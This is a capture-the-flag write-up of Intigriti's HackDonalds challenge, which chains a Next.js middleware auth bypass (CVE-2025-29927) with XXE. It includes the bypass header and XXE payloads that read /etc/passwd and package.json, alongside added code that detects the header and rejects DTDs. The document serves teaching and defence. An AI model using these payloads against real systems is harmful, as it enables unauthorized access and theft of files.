# 0425: HackDonalds

| Name                                                                 | Authors                                                                                 | Category                                           |
| -------------------------------------------------------------------- | --------------------------------------------------------------------------------------- | -------------------------------------------------- |
| [Intigriti April Challenge (2024)](https://hackdonalds.intigriti.io) | [Bastien](https://twitter.com/_bastiendm) + [CryptoCat](https://twitter.com/_CryptoCat) | NextJS Middleware Auth Bypass, CVE-2025-29927, XXE |

[![](https://img.youtube.com/vi/KwD_TKZr0YY/0.jpg)](https://www.youtube.com/watch?v=KwD_TKZr0YY)

## Challenge Description

> Find the FLAG and win Intigriti swag! 🏆

## Useful Resources

* [Next.js Middleware Auth Bypass (CVE-2025-29927)](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware)
* [XML External Entity Injection (XXE)](https://portswigger.net/web-security/xxe)

## Solution

Bastien (BAS10) made most of this challenge. I (CryptoCat) just made the UI *cough* ChatGPT *cough* and fixed a few bugs/unintended solutions. It's a lot easier than the typical Intigriti monthly challenge - thankfully, as it came only a week after the crazy chain by 0x999 in the [March '25 challenge](https://bugology.intigriti.io/intigriti-monthly-challenges/0325). Therefore, this one was run more informally, without all the usual prizes, promo, domain name etc.

### Recon

The challenge did not come with source code, so we must follow a black box approach.

#### Site Functionality

The website doesn't appear to have a lot of functionality; there's a homepage and a food menu.

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-1510a9cb4b87d58aa1ae5a27707b4cd9cdb1a639%2F0.PNG?alt=media)

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-d99df13e611787ecf4dbfe497ce14c5a48b3a9d4%2F1.PNG?alt=media)

There's also an admin section which, as hackers, should be interesting to us.

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-d44820bdd26ba0edec9f6404fef216db1a1b8e46%2F2.PNG?alt=media)

We might try some basic SQLi, default/common password etc. However, it will get us nowhere. Digging into the client-side code is also fairly unproductive - since it's a NextJS application, the code is hard to read and most of the important stuff is on the server-side.

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-23882a90c8b3083334984dbfee3a9c3554dedbf7%2F3.PNG?alt=media)

Wait, NextJS? Weren't there some [crazy vulns](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware) discovered in it recently 🤔 Let's check the version with Wappalyzer 👀

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-a12b32fe2183eccfc6972b9643fdd409fb2ea9f8%2F4.PNG?alt=media)

Back to the advisory:

**CVE-2025-29927** affects **all Next.js versions from 11.1.4 up to 15.1.7** and allows **middleware bypass** via a specially crafted `x-middleware-subrequest` header.

Vulnerability confirmed ✅

### Next.js Middleware Auth Bypass (CVE-2025-29927)

Middleware in Next.js is commonly used for:

* Authentication / Authorization
* Rewrites / Redirects
* Adding security headers (CSP, etc.)

This vulnerability allows attackers to **bypass middleware protections entirely**, leading to:

* **Authorization bypass**
* **Content Security Policy (CSP) bypass**
* **DoS via Cache Poisoning (CPDoS)**

An auth bypass would be perfect for us! Maybe it can get us into the admin panel without knowing the password?

Let's request the `/admin` page while including the following HTTP header.

```http
x-middleware-subrequest: middleware
```

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-05417f917c004679e0402fcf2b26d43b3bfa0198%2F5.PNG?alt=media)

Easy! Now we just need to include this header on each request to maintain our access 😎
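From the defender's side, the same header is the thing to look for. The vendor's interim advice for deployments that could not patch immediately was to keep external requests carrying `x-middleware-subrequest` from reaching the Next.js app at all; the real fix is upgrading to a patched release. The following is an added example (not code from the challenge, whose source was never released): a small detector run over a few constructed JSON access-log lines, plus the edge-side filter that drops the header. The log format and the `/admin` prefix are assumptions for the example.

```javascript
// Added example (not part of the original write-up): detection of the
// CVE-2025-29927 bypass header in request logs, plus an edge-side filter.
// The JSON access-log format below is constructed for this example.

const BYPASS_HEADER = 'x-middleware-subrequest';

// Case-insensitive lookup: HTTP header names are case-insensitive and
// Node normalises them to lower case, but raw proxy logs may not.
function hasBypassHeader(headers) {
  return Object.keys(headers).some((k) => k.toLowerCase() === BYPASS_HEADER);
}

// Edge/proxy filter: drop the header from any external request before it
// reaches the Next.js app. Returns a new header object, input untouched.
function stripBypassHeader(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) {
    if (k.toLowerCase() !== BYPASS_HEADER) out[k] = v;
  }
  return out;
}

// Constructed sample of JSON access-log lines (one request per line).
// Line 2 is the normal redirect to login; line 3 is the bypass succeeding.
const SAMPLE_LOG = [
  '{"ts":"2025-04-10T12:00:01Z","ip":"203.0.113.5","method":"GET","path":"/","status":200,"headers":{"user-agent":"Mozilla/5.0"}}',
  '{"ts":"2025-04-10T12:00:07Z","ip":"203.0.113.5","method":"GET","path":"/admin","status":307,"headers":{"user-agent":"Mozilla/5.0"}}',
  '{"ts":"2025-04-10T12:00:09Z","ip":"203.0.113.5","method":"GET","path":"/admin","status":200,"headers":{"user-agent":"Mozilla/5.0","X-Middleware-Subrequest":"middleware"}}',
  '{"ts":"2025-04-10T12:00:15Z","ip":"198.51.100.9","method":"GET","path":"/menu","status":200,"headers":{"user-agent":"curl/8.0"}}',
  'not json at all',
].join('\n');

// Scan a log and return the entries that carried the header. A request to
// a protected path that returned 200 with the header present is the case
// worth paging on, so each finding records that as likelyBypass.
function scanAccessLog(logText, protectedPrefixes = ['/admin']) {
  const findings = [];
  for (const line of logText.split('\n')) {
    let entry;
    try { entry = JSON.parse(line); } catch { continue; } // skip malformed lines
    if (!entry.headers || !hasBypassHeader(entry.headers)) continue;
    const protectedPath = protectedPrefixes.some((p) => entry.path.startsWith(p));
    findings.push({
      ts: entry.ts, ip: entry.ip, path: entry.path, status: entry.status,
      likelyBypass: protectedPath && entry.status === 200,
    });
  }
  return findings;
}

console.log(scanAccessLog(SAMPLE_LOG)); // one finding: /admin, status 200, likelyBypass true
```

The detector only works if the proxy logs request headers; if it does not, the cheapest signal is a 200 on a protected path from a client that never received a session cookie. The filter must run at the first hop that accepts external traffic, since an internal hop that re-adds the header is exactly what the framework trusts.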

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-7a567e09c1f2a5284503d8e9614c74ff2634e0e1%2F6.PNG?alt=media)

We can only click on the `Ice Cream Machines` option, which allows us to view the settings of various machines (notoriously buggy/broken at HackDonalds 👀).

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-e812c6684f26f5e647574af83737857986f54ab5%2F7.PNG?alt=media)

### XML External Entity Injection (XXE)

So, what do we have here? An XML config input that can be parsed.

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-34d100118f3c1e1969a874e6703c3e4df1f167b2%2F8.PNG?alt=media)

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-f3140e15618bd09e0031421af149225c38049d3c%2F9.PNG?alt=media)

Any CTF player or bug bounty hunter should know what to check for here; XXE 👇

**XXE (XML External Entity)** is a vulnerability that occurs when an XML parser **processes external entities** defined in XML documents. If not properly configured, it can be exploited to:

* **Read local files** (`file:///etc/passwd`)
* **Perform SSRF** (e.g., hitting internal services)
* **DoS** via "billion laughs" attack
* **Exfiltrate data** via out-of-band channels (OAST, DNS, etc.)

If we replace the parsed input with a payload to read `/etc/passwd`:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>
```

We successfully retrieve the file contents!
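The parser behind this form expanded the external entity, which is the whole bug. The authoritative fix is to configure the XML parser so that DTD processing and entity substitution are off; a cheap defence-in-depth layer in front of it is to refuse any document that declares a DTD or references an entity the parser was never told about. The block below is an added example, not the challenge's own code (which was never published): a pre-parse gate that fails closed, followed by a minimal field extractor for the machine config. The `parseMachineConfig` helper and its tag-based extraction are assumptions for the example, not a full XML parser.

```javascript
// Added example (not from the challenge's source): a pre-parse gate that
// rejects XML carrying a DTD or non-standard entity references, so a
// downstream parser never sees an external entity.

// The five entities XML predefines; anything else needs a DTD to exist.
const PREDEFINED = new Set(['amp', 'lt', 'gt', 'quot', 'apos']);

// Returns { ok: true } or { ok: false, reason }. Fails closed: anything
// that looks like a DTD is rejected, even if it sits inside a comment.
function checkXmlForXxe(xml) {
  if (/<!DOCTYPE/i.test(xml)) return { ok: false, reason: 'DOCTYPE declaration not allowed' };
  if (/<!ENTITY/i.test(xml)) return { ok: false, reason: 'ENTITY declaration not allowed' };
  for (const m of xml.matchAll(/&([^;\s<]+);/g)) {
    const name = m[1];
    if (name.startsWith('#')) continue; // numeric character reference, e.g. &#xA9;
    if (!PREDEFINED.has(name)) return { ok: false, reason: `undeclared entity reference &${name};` };
  }
  return { ok: true };
}

// Minimal extraction of the fields the ice-cream machine form uses. Only
// runs after the gate passes; deliberately not a general XML parser.
function parseMachineConfig(xml) {
  const gate = checkXmlForXxe(xml);
  if (!gate.ok) throw new Error(`rejected: ${gate.reason}`);
  const field = (tag) => {
    const m = xml.match(new RegExp(`<${tag}>([^<]*)</${tag}>`));
    return m ? m[1] : null;
  };
  return {
    id: field('id'),
    name: field('name'),
    temperature: Number(field('temperature')),
    mixLevel: Number(field('mixLevel')),
  };
}

// Constructed inputs: the write-up's file-read payload and a benign config.
const XXE_PAYLOAD = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<machine><id>1</id><name>&xxe;</name><temperature>-18</temperature><mixLevel>75</mixLevel></machine>`;

const BENIGN = `<?xml version="1.0" encoding="UTF-8"?>
<machine><id>1</id><name>Machine 1</name><temperature>-18</temperature><mixLevel>75</mixLevel></machine>`;

console.log(checkXmlForXxe(XXE_PAYLOAD)); // { ok: false, reason: 'DOCTYPE declaration not allowed' }
console.log(parseMachineConfig(BENIGN));  // { id: '1', name: 'Machine 1', temperature: -18, mixLevel: 75 }
```

Rejecting on `<!DOCTYPE` rather than trying to distinguish harmless internal DTDs from external ones is the point: a config upload never needs a DTD, so the false-positive cost is zero, while the check catches parameter-entity and out-of-band variants that a content-based filter on `SYSTEM` alone would miss.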

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-159e03f2a4dd485e343204c576d3b06c6668014a%2F10.PNG?alt=media)

#### Local File Read (Source Code Disclosure)

Where is the flag though? In a real world scenario, we might look for common files of interest (plenty of wordlists online). Since we know this is a NextJS app, why don't we ask ChatGPT what the common location is and what interesting files it might have?

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-874eab2dac7ea77982a41c36b60c7fc998c62eef%2F11.PNG?alt=media)

Nice, so we can try enumerating all of these files starting with the `/app/` directory 😼

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [
  <!ENTITY xxe SYSTEM "file:///app/package.json">
]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>
```

![](https://2708110538-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNUPDKoPRoHJXZ5NIczSq%2Fuploads%2Fgit-blob-3154e1c7681822816c3dc89faedcfd0c62d41db1%2F12.PNG?alt=media)

There we have our flag: `INTIGRITI{XXE_1n_Ic3Cr34m_M4ch1n3s}` 🚩

Some players retrieved the same file from `/proc/self/cwd/package.json` or simply `package.json`.

## Community Writeups

1. [r0guebyte](https://rentry.co/r0gue-writeup-hackdonalds-dad1001f-2238-49ce-80e0-952a0a1cb944)
2. [excile](https://gist.github.com/excile1/56044173c39a28635f547f3bbedf05b5)
3. [gurux090](https://gurudattchoudhary.medium.com/intigriti-hackdonalds-ctf-writeup-chaining-next-js-fa0d8f6acbef)
4. [wa1m3im](https://gist.github.com/Wa1m3im/b0d1a087a9e363d66fc50cfdb8ea705f)
5. [optybg](https://www.notion.so/HackDonalds-Challenge-Writeup-1d39b56cbe8880ccb168ff03a9f60c8e?pvs=4)
6. [gilsgil](https://intigriti.hatamotosec.com/hackdonalds-writeup/ec4ac52ad1c4c88f1588fa68510cbaf8.html)
7. [boffman](https://gist.github.com/boffman/258bf6b13d59cbcfa507b15b414c3b2d)
8. [harshilsecops](https://medium.com/@harshilsecops/820933e85d99)
9. [ruur](https://ruur.gitbook.io/ctf-writeups/ctf-writeups/hackdonalds-intigriti)
10. [nagasaikiran](https://nagasaikiran.com/hackdonalds-challenge-writeup)
11. [khandlq](https://www.notion.so/Challenge-https-app-intigriti-com-programs-intigriti-challenge-hackdonalds-detail-1d0fde163055800cb1f1fbe8dff8f666?pvs=4)
12. [priesthood\_singh](https://medium.com/@adityagulati07/intigriti-hackdonalds-challenge-cb8d7e60ee7c)
13. [mami](https://github.com/MaMi364/Hackdonalds-Intigriti)
14. [roys](https://github.com/roys/ctf-writeups/tree/main/intigriti-2025-04)
15. [cybersecu](https://gist.github.com/Siss3l/7a6b55978214325f60464f4f92ecce07)
16. [juniorbrets](https://medium.com/@cipher01x/breaking-into-hackdonalds-xxe-middleware-abuse-ctf-writeup-5e67fadbb1bd)
17. [rishal865](https://www.linkedin.com/posts/mohammed-rishal-0453a8212_hackdonalds-ctf-activity-7318131723127468033-ilJJ)
18. [vilz](https://github.com/LuisVila99/hackdonalds)
19. [cybrik](https://medium.com/@shreechandragiri21/hacking-hackdonalds-from-auth-bypass-to-xxe-my-3-hour-midnight-frenzy-0a5e120af2b2)
20. [cybercrusader](https://medium.com/@vighnesh.cybersec/breaking-the-ice-cream-machines-a-hackdonalds-ctf-story-of-auth-bypass-and-xml-shenanigans-4d648eab7f33)
